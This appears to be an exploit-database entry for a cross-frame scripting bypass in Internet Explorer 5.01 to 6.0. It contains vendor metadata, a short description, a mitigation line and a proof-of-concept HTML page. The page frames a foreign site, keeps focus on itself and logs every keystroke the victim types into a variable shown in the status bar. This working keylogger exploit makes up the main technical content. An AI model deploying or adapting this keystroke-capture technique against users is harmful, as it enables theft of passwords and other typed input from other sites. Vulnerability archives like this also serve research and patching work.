Microsoft Internet Explorer Cross Frame Scripting Restriction Bypass

vendor:

Internet Explorer

by:

SecurityFocus

7.5

CVSS

HIGH

Cross Frame Scripting Restriction Bypass

352

CWE

Product Name: Internet Explorer

Affected Version From: Microsoft Internet Explorer 5.01

Affected Version To: Microsoft Internet Explorer 6.0

Patch Exists: YES

Related CWE: N/A

CPE: a:microsoft:internet_explorer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2005

Microsoft Internet Explorer Cross Frame Scripting Restriction Bypass

Microsoft Internet Explorer is reported to be prone to an issue that may leak sensitive information across foreign domains. This issue could permit framesets in different domains to leak various events, including keyboard events. This could effectively permit a hostile web page to capture keystrokes from a foreign domain.

Mitigation:

Ensure that the application is configured to use the most current version of Internet Explorer.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9761/info

Microsoft Internet Explorer is reported to be prone to an issue that may leak sensitive information across foreign domains.

This issue could permit framesets in different domains to leak various events, including keyboard events. This could effectively permit a hostile web page to capture keystrokes from a foreign domain. 

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.example.com" scrolling="auto">
</frameset>
</html>